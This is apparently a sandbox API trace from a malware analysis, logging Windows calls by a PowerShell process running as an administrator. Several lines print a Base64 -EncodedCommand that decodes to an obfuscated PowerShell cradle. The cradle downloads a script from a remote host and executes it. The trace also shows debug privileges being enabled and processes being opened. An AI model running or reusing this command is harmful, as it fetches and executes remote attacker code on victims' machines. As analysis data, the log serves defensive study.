	[0410.301] CoTaskMemFree (pv=0x34e8b0) 
	[0410.314] CoTaskMemAlloc (cb=0x3b) returned 0x1b8020d0
	[0410.314] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c76e4f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c76e4f8) returned 0x4550
	[0410.315] CoTaskMemFree (pv=0x1b8020d0) 
	[0410.318] GetConsoleWindow () returned 0x102ac
	[0410.326] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0410.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.326] CoTaskMemFree (pv=0x34e8b0) 
	[0410.327] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0410.327] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0410.327] CoTaskMemFree (pv=0x34e8b0) 
	[0410.333] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0410.333] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0410.333] CoTaskMemFree (pv=0x34e8b0) 
	[0410.335] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c76e540 | out: pNumArgs=0x1c76e540) returned 0x1b806bb0*=""
	[0410.337] lstrlenW (lpString="-EncodedCommand") returned 15
	[0410.338] CoTaskMemAlloc (cb=0x22) returned 0x1b7faee0
	[0410.338] RtlMoveMemory (in: Destination=0x1b7faee0, Source=0x1b806bd2, Length=0x20 | out: Destination=0x1b7faee0) 
	[0410.338] CoTaskMemFree (pv=0x1b7faee0) 
	[0410.338] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0410.338] CoTaskMemAlloc (cb=0x2f4) returned 0x1b806ef0
	[0410.338] RtlMoveMemory (in: Destination=0x1b806ef0, Source=0x1b806bf2, Length=0x2f2 | out: Destination=0x1b806ef0) 
	[0410.338] CoTaskMemFree (pv=0x1b806ef0) 
	[0410.339] LocalFree (hMem=0x1b806bb0) returned 0x0
	[0410.339] CoTaskMemAlloc (cb=0x804) returned 0x1b806bb0
	[0410.339] GetConsoleTitleW (in: lpConsoleTitle=0x1b806bb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0410.689] CoTaskMemFree (pv=0x1b806bb0) 
	[0410.698] CoTaskMemAlloc (cb=0x38e) returned 0x1b806bb0
	[0410.698] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c76e4a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31128f8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x31128f8*(hProcess=0x360, hThread=0x35c, dwProcessId=0x13e8, dwThreadId=0xc78)) returned 1
	[0410.702] CoTaskMemFree (pv=0x1b806bb0) 
	[0410.703] CloseHandle (hObject=0x35c) returned 1
	[0410.703] CoTaskMemAlloc (cb=0x3b) returned 0x1b8020d0
	[0410.703] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c76e548, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c76e548) returned 0x4550
	[0410.703] CoTaskMemFree (pv=0x1b8020d0) 
	[0410.706] GetCurrentProcess () returned 0xffffffffffffffff
	[0410.707] GetCurrentProcess () returned 0xffffffffffffffff
	[0410.707] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c76e628, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c76e628*=0x35c) returned 1

Process:
	id = "30"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2abbb000"
	os_pid = "0x8e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 167
	os_tid = 0x910

	[0405.695] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0407.005] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0407.006] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0407.006] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0407.006] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0410.649] GetVersionExW (in: lpVersionInformation=0x24db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0410.651] GetVersionExW (in: lpVersionInformation=0x24db20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0410.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.665] GetVersionExW (in: lpVersionInformation=0x24d890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0410.666] SetErrorMode (uMode=0x1) returned 0x1
	[0410.667] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24d9f0 | out: lpFileInformation=0x24d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0410.668] SetErrorMode (uMode=0x1) returned 0x1
	[0410.672] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dc60 | out: lpdwHandle=0x24dc60) returned 0x94c
	[0410.674] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c972d8 | out: lpData=0x2c972d8) returned 1
	[0410.676] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dbd8, puLen=0x24dbd0 | out: lplpBuffer=0x24dbd8*=0x2c97374, puLen=0x24dbd0) returned 1
	[0410.679] lstrlenW (lpString="䅁") returned 1
	[0410.688] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c97450, puLen=0x24db40) returned 1
	[0411.095] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0411.097] CoTaskMemAlloc (cb=0x2e) returned 0x473460
	[0411.097] lstrcpyW (in: lpString1=0x473460, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0411.098] CoTaskMemFree (pv=0x473460) 
	[0411.099] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c974a4, puLen=0x24db40) returned 1
	[0411.099] lstrlenW (lpString="System.Management.Automation") returned 28
	[0411.099] CoTaskMemAlloc (cb=0x3c) returned 0x3b97c0
	[0411.099] lstrcpyW (in: lpString1=0x3b97c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0411.099] CoTaskMemFree (pv=0x3b97c0) 
	[0411.099] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c97500, puLen=0x24db40) returned 1
	[0411.099] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0411.099] CoTaskMemAlloc (cb=0x20) returned 0x46f310
	[0411.099] lstrcpyW (in: lpString1=0x46f310, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0411.099] CoTaskMemFree (pv=0x46f310) 
	[0411.099] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c97540, puLen=0x24db40) returned 1
	[0411.099] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0411.099] CoTaskMemAlloc (cb=0x44) returned 0x3b97c0
	[0411.099] lstrcpyW (in: lpString1=0x3b97c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0411.099] CoTaskMemFree (pv=0x3b97c0) 
	[0411.099] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c975a8, puLen=0x24db40) returned 1
	[0411.099] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0411.099] CoTaskMemAlloc (cb=0x76) returned 0x420d80
	[0411.099] lstrcpyW (in: lpString1=0x420d80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0411.099] CoTaskMemFree (pv=0x420d80) 
	[0411.099] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c97644, puLen=0x24db40) returned 1
	[0411.099] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0411.099] CoTaskMemAlloc (cb=0x44) returned 0x3b97c0
	[0411.099] lstrcpyW (in: lpString1=0x3b97c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0411.099] CoTaskMemFree (pv=0x3b97c0) 
	[0411.099] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c976a8, puLen=0x24db40) returned 1
	[0411.099] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0411.099] CoTaskMemAlloc (cb=0x58) returned 0x4464e0
	[0411.099] lstrcpyW (in: lpString1=0x4464e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0411.099] CoTaskMemFree (pv=0x4464e0) 
	[0411.100] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c97724, puLen=0x24db40) returned 1
	[0411.100] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0411.100] CoTaskMemAlloc (cb=0x20) returned 0x46f310
	[0411.100] lstrcpyW (in: lpString1=0x46f310, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0411.100] CoTaskMemFree (pv=0x46f310) 
	[0411.100] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2c973cc, puLen=0x24db40) returned 1
	[0411.100] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0411.100] CoTaskMemAlloc (cb=0x66) returned 0x469ae0
	[0411.100] lstrcpyW (in: lpString1=0x469ae0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0411.100] CoTaskMemFree (pv=0x469ae0) 
	[0411.100] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x0, puLen=0x24db40) returned 0
	[0411.100] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x0, puLen=0x24db40) returned 0
	[0411.100] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x0, puLen=0x24db40) returned 0
	[0411.100] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24db18, puLen=0x24db10 | out: lplpBuffer=0x24db18*=0x2c97374, puLen=0x24db10) returned 1
	[0411.101] CoTaskMemAlloc (cb=0x204) returned 0x423af0
	[0411.101] VerLanguageNameW (in: wLang=0x0, szLang=0x423af0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0411.102] CoTaskMemFree (pv=0x423af0) 
	[0411.103] VerQueryValueW (in: pBlock=0x2c972d8, lpSubBlock="\\", lplpBuffer=0x24db68, puLen=0x24db60 | out: lplpBuffer=0x24db68*=0x2c97300, puLen=0x24db60) returned 1
	[0411.108] GetCurrentProcessId () returned 0x8e8
	[0411.124] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24ca90 | out: lpLuid=0x24ca90*(LowPart=0x14, HighPart=0)) returned 1
	[0411.127] GetCurrentProcess () returned 0xffffffffffffffff
	[0411.127] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cab0 | out: TokenHandle=0x24cab0*=0x2d8) returned 1
	[0411.128] AdjustTokenPrivileges (in: TokenHandle=0x2d8, DisableAllPrivileges=0, NewState=0x2c9ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0411.130] CloseHandle (hObject=0x2d8) returned 1
	[0411.134] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e8) returned 0x2d8
	[0411.456] EnumProcessModules (in: hProcess=0x2d8, lphModule=0x2c9abb8, cb=0x200, lpcbNeeded=0x24dac8 | out: lphModule=0x2c9abb8, lpcbNeeded=0x24dac8) returned 1
	[0411.459] GetModuleInformation (in: hProcess=0x2d8, hModule=0x13f370000, lpmodinfo=0x2c9ae28, cb=0x18 | out: lpmodinfo=0x2c9ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0411.460] CoTaskMemAlloc (cb=0x804) returned 0x479730
	[0411.460] GetModuleBaseNameW (in: hProcess=0x2d8, hModule=0x13f370000, lpBaseName=0x479730, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0411.460] CoTaskMemFree (pv=0x479730) 
	[0411.461] CoTaskMemAlloc (cb=0x804) returned 0x479730
	[0411.461] GetModuleFileNameExW (in: hProcess=0x2d8, hModule=0x13f370000, lpFilename=0x479730, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0411.461] CoTaskMemFree (pv=0x479730) 
	[0411.462] CloseHandle (hObject=0x2d8) returned 1
	[0411.485] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x8e8) returned 0x2d8
	[0411.486] GetExitCodeProcess (in: hProcess=0x2d8, lpExitCode=0x24dbf8 | out: lpExitCode=0x24dbf8*=0x103) returned 1
	[0411.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c9b088, Length=0x20000, ResultLength=0x24dbc0 | out: SystemInformation=0x12c9b088, ResultLength=0x24dbc0*=0x24dc0) returned 0xc0000004
	[0411.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cbb0b8, Length=0x275c0, ResultLength=0x24dbc0 | out: SystemInformation=0x12cbb0b8, ResultLength=0x24dbc0*=0x24dc0) returned 0x0
	[0411.506] EnumWindows (lpEnumFunc=0x1f866ac, lParam=0x0) returned 1
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x558
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x538
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x778
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x778
	[0413.221] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.222] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xdb0
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1398
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1358
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1370
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1340
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x130c
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x12c0
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x12e4
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1270
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1298
	[0413.223] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x120c
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x122c
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x11c4
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x11b0
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1188
